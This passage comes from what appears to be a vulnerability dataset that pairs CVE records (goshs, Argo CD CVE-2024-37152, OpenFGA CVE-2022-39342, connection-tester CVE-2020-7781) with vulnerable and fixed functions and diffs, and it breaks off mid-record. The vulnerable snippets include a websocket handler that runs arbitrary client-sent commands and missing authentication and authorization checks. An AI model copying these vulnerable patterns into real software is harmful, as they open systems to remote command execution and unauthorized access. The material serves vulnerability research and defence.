hub\n\t\tfs.Hub = ws.NewHub(fs.Clipboard, fs.CLI)\n\t\tgo fs.Hub.Run()\n\t}\n\n\t// Print silent banner\n\tif fs.Silent {\n\t\tlogger.Info(\"Serving in silent mode - no dir listing available at HTTP Listener\")\n\t}\n\n\t// Print all embedded files as info to the 
console\n\tfs.PrintEmbeddedFiles()\n\n\t// Register webhook\n\tif fs.WebhookEnable {\n\t\tswitch strings.ToLower(fs.WebhookProvider) {\n\t\tcase \"discord\":\n\t\t\tfs.Webhook = &webhook.DiscordWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t\tUsername: \"goshs\",\n\t\t\t}\n\t\tcase \"slack\":\n\t\t\tfs.Webhook = &webhook.SlackWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t}\n\t\tcase \"mattermost\":\n\t\t\tfs.Webhook = &webhook.MattermostWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t\tUsername: \"goshs\",\n\t\t\t}\n\t\tdefault:\n\t\t\tlogger.Fatalf(\"Webhook provider '%s' not supported\", fs.WebhookProvider)\n\t\t}\n\t}\n\n\t// Start listener\n\tfs.StartListener(server, what, listener)\n}"}, {"id": "fix_go_222_2", "commit": "160220974576afe5111485b8d12fd36058984cfa", "file_path": "ws/client.go", "start_line": 80, "end_line": 132, "snippet": "func (c *Client) dispatchReadPump(packet Packet) {\n\t// Switch here over possible socket events and pull in handlers\n\tswitch packet.Type {\n\tcase \"newEntry\":\n\t\tvar entry string\n\t\tif err := json.Unmarshal(packet.Content, &entry); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tif err := c.hub.cb.AddEntry(entry); err != nil {\n\t\t\tlogger.Errorf(\"Error creating Clipboard entry: %+v\", err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"delEntry\":\n\t\tvar id string\n\t\tif err := json.Unmarshal(packet.Content, &id); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tiid, err := strconv.Atoi(id)\n\t\tif err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tif err := c.hub.cb.DeleteEntry(iid); err != nil {\n\t\t\tlogger.Errorf(\"Error to delete Clipboard entry with id: %s: %+v\", string(packet.Content), err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"clearClipboard\":\n\t\tif err := c.hub.cb.ClearClipboard(); err != nil {\n\t\t\tlogger.Errorf(\"Error clearing clipboard: %+v\", err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"command\":\n\t\tif c.hub.cliEnabled {\n\t\t\tvar command string\n\t\t\tif err := json.Unmarshal(packet.Content, &command); err != nil {\n\t\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t\t}\n\t\t\tlogger.Debugf(\"Command was: %+v\", command)\n\t\t\toutput, err := cli.RunCMD(command)\n\t\t\tif err != nil {\n\t\t\t\tlogger.Errorf(\"Error running command: %+v\", err)\n\t\t\t}\n\t\t\tlogger.Debugf(\"Output: %+v\", output)\n\t\t\tc.updateCLI(output)\n\t\t}\n\n\tdefault:\n\t\tlogger.Warnf(\"The event sent via websocket cannot be handeled: %+v\", packet.Type)\n\t}\n\n}"}, {"id": "fix_go_222_3", "commit": "160220974576afe5111485b8d12fd36058984cfa", "file_path": "ws/hub.go", "start_line": 9, "end_line": 27, "snippet": "type Hub struct {\n\t// Registered clients.\n\tclients map[*Client]bool\n\n\t// Inbound messages from the clients.\n\tbroadcast chan []byte\n\n\t// Register requests from the clients.\n\tregister chan *Client\n\n\t// Unregister requests from clients.\n\tunregister chan *Client\n\n\t// Handle clipboard\n\tcb *clipboard.Clipboard\n\n\t// CLI Enabled\n\tcliEnabled bool\n}"}, {"id": "fix_go_222_4", "commit": "160220974576afe5111485b8d12fd36058984cfa", "file_path": "ws/hub.go", "start_line": 30, "end_line": 39, "snippet": "func NewHub(cb *clipboard.Clipboard, cliEnabled bool) *Hub {\n\treturn &Hub{\n\t\tbroadcast: make(chan []byte),\n\t\tregister: make(chan *Client),\n\t\tunregister: make(chan *Client),\n\t\tclients: make(map[*Client]bool),\n\t\tcb: cb,\n\t\tcliEnabled: cliEnabled,\n\t}\n}"}], 
"vul_patch": "--- a/httpserver/server.go\n+++ b/httpserver/server.go\n@@ -29,7 +29,7 @@\n \t\tfs.Clipboard = clipboard.New()\n \n \t\t// init websocket hub\n-\t\tfs.Hub = ws.NewHub(fs.Clipboard)\n+\t\tfs.Hub = ws.NewHub(fs.Clipboard, fs.CLI)\n \t\tgo fs.Hub.Run()\n \t}\n \n\n--- a/ws/client.go\n+++ b/ws/client.go\n@@ -32,17 +32,19 @@\n \t\tc.refreshClipboard()\n \n \tcase \"command\":\n-\t\tvar command string\n-\t\tif err := json.Unmarshal(packet.Content, &command); err != nil {\n-\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n+\t\tif c.hub.cliEnabled {\n+\t\t\tvar command string\n+\t\t\tif err := json.Unmarshal(packet.Content, &command); err != nil {\n+\t\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n+\t\t\t}\n+\t\t\tlogger.Debugf(\"Command was: %+v\", command)\n+\t\t\toutput, err := cli.RunCMD(command)\n+\t\t\tif err != nil {\n+\t\t\t\tlogger.Errorf(\"Error running command: %+v\", err)\n+\t\t\t}\n+\t\t\tlogger.Debugf(\"Output: %+v\", output)\n+\t\t\tc.updateCLI(output)\n \t\t}\n-\t\tlogger.Debugf(\"Command was: %+v\", command)\n-\t\toutput, err := cli.RunCMD(command)\n-\t\tif err != nil {\n-\t\t\tlogger.Errorf(\"Error running command: %+v\", err)\n-\t\t}\n-\t\tlogger.Debugf(\"Output: %+v\", output)\n-\t\tc.updateCLI(output)\n \n \tdefault:\n \t\tlogger.Warnf(\"The event sent via websocket cannot be handeled: %+v\", packet.Type)\n\n--- a/ws/hub.go\n+++ b/ws/hub.go\n@@ -13,4 +13,7 @@\n \n \t// Handle clipboard\n \tcb *clipboard.Clipboard\n+\n+\t// CLI Enabled\n+\tcliEnabled bool\n }\n\n--- a/ws/hub.go\n+++ b/ws/hub.go\n@@ -1,9 +1,10 @@\n-func NewHub(cb *clipboard.Clipboard) *Hub {\n+func NewHub(cb *clipboard.Clipboard, cliEnabled bool) *Hub {\n \treturn &Hub{\n \t\tbroadcast: make(chan []byte),\n \t\tregister: make(chan *Client),\n \t\tunregister: make(chan *Client),\n \t\tclients: make(map[*Client]bool),\n \t\tcb: cb,\n+\t\tcliEnabled: cliEnabled,\n \t}\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-37152", "cve_description": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern. 
This vulnerability is fixed in 2.11.3, 2.10.12, and 2.9.17.", "cwe_info": {"CWE-306": {"name": "Missing Authentication for Critical Function", "description": "The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources."}}, "repo": "https://github.com/argoproj/argo-cd", "patch_url": ["https://github.com/argoproj/argo-cd/commit/256d90178b11b04bc8174d08d7b663a2a7b1771b"], "programing_language": "Go", "vul_func": [{"id": "vul_go_259_1", "commit": "60cdd7dde2bd9d784ae38af48dbb42f1416783ee", "file_path": "server/settings/settings.go", "start_line": 39, "end_line": 146, "snippet": "func (s *Server) Get(ctx context.Context, q *settingspkg.SettingsQuery) (*settingspkg.Settings, error) {\n\tresourceOverrides, err := s.mgr.GetResourceOverrides()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\toverrides := make(map[string]*v1alpha1.ResourceOverride)\n\tfor k := range resourceOverrides {\n\t\tval := resourceOverrides[k]\n\t\toverrides[k] = &val\n\t}\n\tappInstanceLabelKey, err := s.mgr.GetAppInstanceLabelKey()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\targoCDSettings, err := s.mgr.GetSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tgaSettings, err := s.mgr.GetGoogleAnalytics()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\thelp, err := s.mgr.GetHelp()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tuserLoginsDisabled := true\n\taccounts, err := s.mgr.GetAccounts()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, account := range accounts {\n\t\tif account.Enabled && account.HasCapability(settings.AccountCapabilityLogin) {\n\t\t\tuserLoginsDisabled = false\n\t\t\tbreak\n\t\t}\n\t}\n\n\tkustomizeSettings, err := s.mgr.GetKustomizeSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar kustomizeVersions []string\n\tfor i := range kustomizeSettings.Versions {\n\t\tkustomizeVersions = append(kustomizeVersions, kustomizeSettings.Versions[i].Name)\n\t}\n\n\ttrackingMethod, err := s.mgr.GetTrackingMethod()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tset := settingspkg.Settings{\n\t\tURL: argoCDSettings.URL,\n\t\tAppLabelKey: appInstanceLabelKey,\n\t\tResourceOverrides: overrides,\n\t\tStatusBadgeEnabled: argoCDSettings.StatusBadgeEnabled,\n\t\tStatusBadgeRootUrl: argoCDSettings.StatusBadgeRootUrl,\n\t\tKustomizeOptions: &v1alpha1.KustomizeOptions{\n\t\t\tBuildOptions: argoCDSettings.KustomizeBuildOptions,\n\t\t},\n\t\tGoogleAnalytics: &settingspkg.GoogleAnalyticsConfig{\n\t\t\tTrackingID: gaSettings.TrackingID,\n\t\t\tAnonymizeUsers: gaSettings.AnonymizeUsers,\n\t\t},\n\t\tHelp: &settingspkg.Help{\n\t\t\tChatUrl: help.ChatURL,\n\t\t\tChatText: help.ChatText,\n\t\t\tBinaryUrls: help.BinaryURLs,\n\t\t},\n\t\tUserLoginsDisabled: userLoginsDisabled,\n\t\tKustomizeVersions: kustomizeVersions,\n\t\tUiCssURL: argoCDSettings.UiCssURL,\n\t\tPasswordPattern: argoCDSettings.PasswordPattern,\n\t\tTrackingMethod: trackingMethod,\n\t\tExecEnabled: argoCDSettings.ExecEnabled,\n\t\tAppsInAnyNamespaceEnabled: s.appsInAnyNamespaceEnabled,\n\t}\n\n\tif sessionmgr.LoggedIn(ctx) || s.disableAuth {\n\t\tset.UiBannerContent = argoCDSettings.UiBannerContent\n\t\tset.UiBannerURL = argoCDSettings.UiBannerURL\n\t\tset.UiBannerPermanent = argoCDSettings.UiBannerPermanent\n\t\tset.UiBannerPosition = argoCDSettings.UiBannerPosition\n\t\tset.ControllerNamespace = s.mgr.GetNamespace()\n\t}\n\tif argoCDSettings.DexConfig != \"\" {\n\t\tvar cfg settingspkg.DexConfig\n\t\terr = 
yaml.Unmarshal([]byte(argoCDSettings.DexConfig), &cfg)\n\t\tif err == nil {\n\t\t\tset.DexConfig = &cfg\n\t\t}\n\t}\n\tif oidcConfig := argoCDSettings.OIDCConfig(); oidcConfig != nil {\n\t\tset.OIDCConfig = &settingspkg.OIDCConfig{\n\t\t\tName: oidcConfig.Name,\n\t\t\tIssuer: oidcConfig.Issuer,\n\t\t\tClientID: oidcConfig.ClientID,\n\t\t\tCLIClientID: oidcConfig.CLIClientID,\n\t\t\tScopes: oidcConfig.RequestedScopes,\n\t\t\tEnablePKCEAuthentication: oidcConfig.EnablePKCEAuthentication,\n\t\t}\n\t\tif len(argoCDSettings.OIDCConfig().RequestedIDTokenClaims) > 0 {\n\t\t\tset.OIDCConfig.IDTokenClaims = argoCDSettings.OIDCConfig().RequestedIDTokenClaims\n\t\t}\n\t}\n\treturn &set, nil\n}"}], "fix_func": [{"id": "fix_go_259_1", "commit": "256d90178b11b04bc8174d08d7b663a2a7b1771b", "file_path": "server/settings/settings.go", "start_line": 39, "end_line": 148, "snippet": "func (s *Server) Get(ctx context.Context, q *settingspkg.SettingsQuery) (*settingspkg.Settings, error) {\n\tresourceOverrides, err := s.mgr.GetResourceOverrides()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\toverrides := make(map[string]*v1alpha1.ResourceOverride)\n\tfor k := range resourceOverrides {\n\t\tval := resourceOverrides[k]\n\t\toverrides[k] = &val\n\t}\n\tappInstanceLabelKey, err := s.mgr.GetAppInstanceLabelKey()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\targoCDSettings, err := s.mgr.GetSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tgaSettings, err := s.mgr.GetGoogleAnalytics()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\thelp, err := s.mgr.GetHelp()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tuserLoginsDisabled := true\n\taccounts, err := s.mgr.GetAccounts()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, account := range accounts {\n\t\tif account.Enabled && account.HasCapability(settings.AccountCapabilityLogin) {\n\t\t\tuserLoginsDisabled = false\n\t\t\tbreak\n\t\t}\n\t}\n\n\tkustomizeSettings, err := s.mgr.GetKustomizeSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar kustomizeVersions []string\n\tfor i := range kustomizeSettings.Versions {\n\t\tkustomizeVersions = append(kustomizeVersions, kustomizeSettings.Versions[i].Name)\n\t}\n\n\ttrackingMethod, err := s.mgr.GetTrackingMethod()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tset := settingspkg.Settings{\n\t\tURL: argoCDSettings.URL,\n\t\tAppLabelKey: appInstanceLabelKey,\n\t\tResourceOverrides: overrides,\n\t\tStatusBadgeEnabled: argoCDSettings.StatusBadgeEnabled,\n\t\tStatusBadgeRootUrl: argoCDSettings.StatusBadgeRootUrl,\n\t\tKustomizeOptions: &v1alpha1.KustomizeOptions{\n\t\t\tBuildOptions: argoCDSettings.KustomizeBuildOptions,\n\t\t},\n\t\tGoogleAnalytics: &settingspkg.GoogleAnalyticsConfig{\n\t\t\tTrackingID: gaSettings.TrackingID,\n\t\t\tAnonymizeUsers: gaSettings.AnonymizeUsers,\n\t\t},\n\t\tHelp: &settingspkg.Help{\n\t\t\tChatUrl: help.ChatURL,\n\t\t\tChatText: help.ChatText,\n\t\t\tBinaryUrls: help.BinaryURLs,\n\t\t},\n\t\tUserLoginsDisabled: userLoginsDisabled,\n\t\tKustomizeVersions: kustomizeVersions,\n\t\tUiCssURL: argoCDSettings.UiCssURL,\n\t\tTrackingMethod: trackingMethod,\n\t\tExecEnabled: argoCDSettings.ExecEnabled,\n\t\tAppsInAnyNamespaceEnabled: s.appsInAnyNamespaceEnabled,\n\t}\n\n\tif sessionmgr.LoggedIn(ctx) || s.disableAuth {\n\t\tset.UiBannerContent = argoCDSettings.UiBannerContent\n\t\tset.UiBannerURL = argoCDSettings.UiBannerURL\n\t\tset.UiBannerPermanent = argoCDSettings.UiBannerPermanent\n\t\tset.UiBannerPosition = argoCDSettings.UiBannerPosition\n\t\tset.ControllerNamespace = 
s.mgr.GetNamespace()\n\t}\n\tif sessionmgr.LoggedIn(ctx) {\n\t\tset.PasswordPattern = argoCDSettings.PasswordPattern\n\t}\n\tif argoCDSettings.DexConfig != \"\" {\n\t\tvar cfg settingspkg.DexConfig\n\t\terr = yaml.Unmarshal([]byte(argoCDSettings.DexConfig), &cfg)\n\t\tif err == nil {\n\t\t\tset.DexConfig = &cfg\n\t\t}\n\t}\n\tif oidcConfig := argoCDSettings.OIDCConfig(); oidcConfig != nil {\n\t\tset.OIDCConfig = &settingspkg.OIDCConfig{\n\t\t\tName: oidcConfig.Name,\n\t\t\tIssuer: oidcConfig.Issuer,\n\t\t\tClientID: oidcConfig.ClientID,\n\t\t\tCLIClientID: oidcConfig.CLIClientID,\n\t\t\tScopes: oidcConfig.RequestedScopes,\n\t\t\tEnablePKCEAuthentication: oidcConfig.EnablePKCEAuthentication,\n\t\t}\n\t\tif len(argoCDSettings.OIDCConfig().RequestedIDTokenClaims) > 0 {\n\t\t\tset.OIDCConfig.IDTokenClaims = argoCDSettings.OIDCConfig().RequestedIDTokenClaims\n\t\t}\n\t}\n\treturn &set, nil\n}"}], "vul_patch": "--- a/server/settings/settings.go\n+++ b/server/settings/settings.go\n@@ -71,7 +71,6 @@\n \t\tUserLoginsDisabled: userLoginsDisabled,\n \t\tKustomizeVersions: kustomizeVersions,\n \t\tUiCssURL: argoCDSettings.UiCssURL,\n-\t\tPasswordPattern: argoCDSettings.PasswordPattern,\n \t\tTrackingMethod: trackingMethod,\n \t\tExecEnabled: argoCDSettings.ExecEnabled,\n \t\tAppsInAnyNamespaceEnabled: s.appsInAnyNamespaceEnabled,\n@@ -83,6 +82,9 @@\n \t\tset.UiBannerPermanent = argoCDSettings.UiBannerPermanent\n \t\tset.UiBannerPosition = argoCDSettings.UiBannerPosition\n \t\tset.ControllerNamespace = s.mgr.GetNamespace()\n+\t}\n+\tif sessionmgr.LoggedIn(ctx) {\n+\t\tset.PasswordPattern = argoCDSettings.PasswordPattern\n \t}\n \tif argoCDSettings.DexConfig != \"\" {\n \t\tvar cfg settingspkg.DexConfig\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-39342", "cve_description": "OpenFGA is an authorization/permission engine. Versions prior to version 0.2.4 are vulnerable to authorization bypass under certain conditions. Users whose model has a relation defined as a tupleset (the right hand side of a \u2018from\u2019 statement) that involves anything other than a direct relationship (e.g. \u2018as self\u2019) are vulnerable. 
Version 0.2.4 contains a patch for this issue.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/openfga/openfga", "patch_url": ["https://github.com/openfga/openfga/commit/c8db1ee3d2a366f18e585dd33236340e76e784c4"], "programing_language": "Go", "vul_func": [{"id": "vul_go_125_1", "commit": "b466769", "file_path": "pkg/typesystem/typesystem.go", "start_line": 233, "end_line": 258, "snippet": "func validateRelationRewrites(model *openfgapb.AuthorizationModel) error {\n\ttypeDefinitions := model.GetTypeDefinitions()\n\n\tallRelations := map[string]struct{}{}\n\ttypeToRelations := map[string]map[string]struct{}{}\n\tfor _, td := range typeDefinitions {\n\t\tobjectType := td.GetType()\n\t\ttypeToRelations[objectType] = map[string]struct{}{}\n\t\tfor relation := range td.GetRelations() {\n\t\t\ttypeToRelations[objectType][relation] = struct{}{}\n\t\t\tallRelations[relation] = struct{}{}\n\t\t}\n\t}\n\n\tfor _, td := range typeDefinitions {\n\t\tobjectType := td.GetType()\n\t\tfor relation, rewrite := range td.GetRelations() {\n\t\t\terr := isUsersetRewriteValid(allRelations, typeToRelations[objectType], objectType, relation, rewrite)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "vul_go_125_2", "commit": "b466769", "file_path": "pkg/typesystem/typesystem.go", "start_line": 262, "end_line": 313, "snippet": "func isUsersetRewriteValid(allRelations map[string]struct{}, relationsOnType map[string]struct{}, objectType, relation string, rewrite *openfgapb.Userset) error {\n\tif rewrite.GetUserset() == nil {\n\t\treturn InvalidRelationError(objectType, relation)\n\t}\n\n\tswitch t := rewrite.GetUserset().(type) {\n\tcase *openfgapb.Userset_ComputedUserset:\n\t\tcomputedUserset := t.ComputedUserset.GetRelation()\n\t\tif computedUserset == relation {\n\t\t\treturn InvalidRelationError(objectType, relation)\n\t\t}\n\t\tif _, ok := relationsOnType[computedUserset]; !ok {\n\t\t\treturn RelationDoesNotExistError(objectType, computedUserset)\n\t\t}\n\tcase *openfgapb.Userset_TupleToUserset:\n\t\ttupleset := t.TupleToUserset.GetTupleset().GetRelation()\n\t\tif _, ok := relationsOnType[tupleset]; !ok {\n\t\t\treturn RelationDoesNotExistError(objectType, tupleset)\n\t\t}\n\n\t\tcomputedUserset := t.TupleToUserset.GetComputedUserset().GetRelation()\n\t\tif _, ok := allRelations[computedUserset]; !ok {\n\t\t\treturn RelationDoesNotExistError(\"\", computedUserset)\n\t\t}\n\tcase *openfgapb.Userset_Union:\n\t\tfor _, child := range t.Union.GetChild() {\n\t\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, child)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\tcase *openfgapb.Userset_Intersection:\n\t\tfor _, child := range t.Intersection.GetChild() {\n\t\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, child)\n\t\t\tif 
err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\tcase *openfgapb.Userset_Difference:\n\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, t.Difference.Base)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\terr = isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, t.Difference.Subtract)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_125_1", "commit": "c8db1ee", "file_path": "pkg/typesystem/typesystem.go", "start_line": 234, "end_line": 279, "snippet": "func validateRelationRewrites(model *openfgapb.AuthorizationModel) error {\n\ttypeDefinitions := model.GetTypeDefinitions()\n\n\trelations := map[string]*openfgapb.Relation{}\n\ttyperels := map[string]map[string]*openfgapb.Relation{}\n\n\tfor _, td := range typeDefinitions {\n\t\tobjectType := td.GetType()\n\n\t\ttyperels[objectType] = map[string]*openfgapb.Relation{}\n\n\t\tfor relation, rewrite := range td.GetRelations() {\n\t\t\trelationMetadata := td.GetMetadata().GetRelations()\n\t\t\tmd, ok := relationMetadata[relation]\n\n\t\t\tvar typeinfo *openfgapb.RelationTypeInfo\n\t\t\tif ok {\n\t\t\t\ttypeinfo = &openfgapb.RelationTypeInfo{\n\t\t\t\t\tDirectlyRelatedUserTypes: md.GetDirectlyRelatedUserTypes(),\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tr := &openfgapb.Relation{\n\t\t\t\tName: relation,\n\t\t\t\tRewrite: rewrite,\n\t\t\t\tTypeInfo: typeinfo,\n\t\t\t}\n\n\t\t\ttyperels[objectType][relation] = r\n\t\t\trelations[relation] = r\n\t\t}\n\t}\n\n\tfor _, td := range typeDefinitions {\n\t\tobjectType := td.GetType()\n\n\t\tfor relation, rewrite := range td.GetRelations() {\n\t\t\terr := isUsersetRewriteValid(relations, typerels[objectType], objectType, relation, rewrite)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_125_2", "commit": "c8db1ee", "file_path": "pkg/typesystem/typesystem.go", "start_line": 283, "end_line": 348, "snippet": "func isUsersetRewriteValid(\n\tallRelations map[string]*openfgapb.Relation,\n\trelationsOnType map[string]*openfgapb.Relation,\n\tobjectType, relation string,\n\trewrite *openfgapb.Userset,\n) error {\n\tif rewrite.GetUserset() == nil {\n\t\treturn InvalidRelationError(objectType, relation)\n\t}\n\n\tswitch t := rewrite.GetUserset().(type) {\n\tcase *openfgapb.Userset_ComputedUserset:\n\t\tcomputedUserset := t.ComputedUserset.GetRelation()\n\t\tif computedUserset == relation {\n\t\t\treturn InvalidRelationError(objectType, relation)\n\t\t}\n\t\tif _, ok := relationsOnType[computedUserset]; !ok {\n\t\t\treturn RelationDoesNotExistError(objectType, computedUserset)\n\t\t}\n\tcase *openfgapb.Userset_TupleToUserset:\n\t\ttupleset := t.TupleToUserset.GetTupleset().GetRelation()\n\n\t\ttuplesetRelation, ok := relationsOnType[tupleset]\n\t\tif !ok {\n\t\t\treturn RelationDoesNotExistError(objectType, tupleset)\n\t\t}\n\n\t\t// tupleset relations must only be direct relationships, no rewrites\n\t\t// are allowed on them\n\t\ttuplesetRewrite := tuplesetRelation.GetRewrite()\n\t\tif reflect.TypeOf(tuplesetRewrite.GetUserset()) != reflect.TypeOf(&openfgapb.Userset_This{}) {\n\t\t\treturn errors.Errorf(\"the '%s#%s' relation is referenced in at least one tupleset and thus must be a direct relation\", objectType, tupleset)\n\t\t}\n\n\t\tcomputedUserset := t.TupleToUserset.GetComputedUserset().GetRelation()\n\t\tif _, ok := allRelations[computedUserset]; !ok {\n\t\t\treturn RelationDoesNotExistError(\"\", computedUserset)\n\t\t}\n\tcase 
*openfgapb.Userset_Union:\n\t\tfor _, child := range t.Union.GetChild() {\n\t\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, child)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\tcase *openfgapb.Userset_Intersection:\n\t\tfor _, child := range t.Intersection.GetChild() {\n\t\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, child)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\tcase *openfgapb.Userset_Difference:\n\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, t.Difference.Base)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\terr = isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, t.Difference.Subtract)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/pkg/typesystem/typesystem.go\n+++ b/pkg/typesystem/typesystem.go\n@@ -1,21 +1,41 @@\n func validateRelationRewrites(model *openfgapb.AuthorizationModel) error {\n \ttypeDefinitions := model.GetTypeDefinitions()\n \n-\tallRelations := map[string]struct{}{}\n-\ttypeToRelations := map[string]map[string]struct{}{}\n+\trelations := map[string]*openfgapb.Relation{}\n+\ttyperels := map[string]map[string]*openfgapb.Relation{}\n+\n \tfor _, td := range typeDefinitions {\n \t\tobjectType := td.GetType()\n-\t\ttypeToRelations[objectType] = map[string]struct{}{}\n-\t\tfor relation := range td.GetRelations() {\n-\t\t\ttypeToRelations[objectType][relation] = struct{}{}\n-\t\t\tallRelations[relation] = struct{}{}\n+\n+\t\ttyperels[objectType] = map[string]*openfgapb.Relation{}\n+\n+\t\tfor relation, rewrite := range td.GetRelations() {\n+\t\t\trelationMetadata := td.GetMetadata().GetRelations()\n+\t\t\tmd, ok := relationMetadata[relation]\n+\n+\t\t\tvar typeinfo *openfgapb.RelationTypeInfo\n+\t\t\tif ok {\n+\t\t\t\ttypeinfo = &openfgapb.RelationTypeInfo{\n+\t\t\t\t\tDirectlyRelatedUserTypes: md.GetDirectlyRelatedUserTypes(),\n+\t\t\t\t}\n+\t\t\t}\n+\n+\t\t\tr := &openfgapb.Relation{\n+\t\t\t\tName: relation,\n+\t\t\t\tRewrite: rewrite,\n+\t\t\t\tTypeInfo: typeinfo,\n+\t\t\t}\n+\n+\t\t\ttyperels[objectType][relation] = r\n+\t\t\trelations[relation] = r\n \t\t}\n \t}\n \n \tfor _, td := range typeDefinitions {\n \t\tobjectType := td.GetType()\n+\n \t\tfor relation, rewrite := range td.GetRelations() {\n-\t\t\terr := isUsersetRewriteValid(allRelations, typeToRelations[objectType], objectType, relation, rewrite)\n+\t\t\terr := isUsersetRewriteValid(relations, typerels[objectType], objectType, relation, rewrite)\n \t\t\tif err != nil {\n \t\t\t\treturn err\n \t\t\t}\n\n--- a/pkg/typesystem/typesystem.go\n+++ b/pkg/typesystem/typesystem.go\n@@ -1,4 +1,9 @@\n-func isUsersetRewriteValid(allRelations map[string]struct{}, relationsOnType map[string]struct{}, objectType, relation string, rewrite *openfgapb.Userset) error {\n+func isUsersetRewriteValid(\n+\tallRelations map[string]*openfgapb.Relation,\n+\trelationsOnType map[string]*openfgapb.Relation,\n+\tobjectType, relation string,\n+\trewrite *openfgapb.Userset,\n+) error {\n \tif rewrite.GetUserset() == nil {\n \t\treturn InvalidRelationError(objectType, relation)\n \t}\n@@ -14,8 +19,17 @@\n \t\t}\n \tcase *openfgapb.Userset_TupleToUserset:\n \t\ttupleset := t.TupleToUserset.GetTupleset().GetRelation()\n-\t\tif _, ok := relationsOnType[tupleset]; !ok {\n+\n+\t\ttuplesetRelation, ok := relationsOnType[tupleset]\n+\t\tif !ok {\n \t\t\treturn RelationDoesNotExistError(objectType, 
tupleset)\n+\t\t}\n+\n+\t\t// tupleset relations must only be direct relationships, no rewrites\n+\t\t// are allowed on them\n+\t\ttuplesetRewrite := tuplesetRelation.GetRewrite()\n+\t\tif reflect.TypeOf(tuplesetRewrite.GetUserset()) != reflect.TypeOf(&openfgapb.Userset_This{}) {\n+\t\t\treturn errors.Errorf(\"the '%s#%s' relation is referenced in at least one tupleset and thus must be a direct relation\", objectType, tupleset)\n \t\t}\n \n \t\tcomputedUserset := t.TupleToUserset.GetComputedUserset().GetRelation()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-7781", "cve_description": "This affects the package connection-tester before 0.2.1. The injection point is located in line 15 in index.js. The following PoC demonstrates the vulnerability:", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/skoranga/node-connection-tester", "patch_url": ["https://github.com/skoranga/node-connection-tester/commit/c1dc374138e1a9d3361c4b8e1ddb1a81d4b45bee"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_28_1", "commit": "7d7b7112d4bfe5a711b292fa046edd57e9da9266", "file_path": "index.js", "start_line": 78, 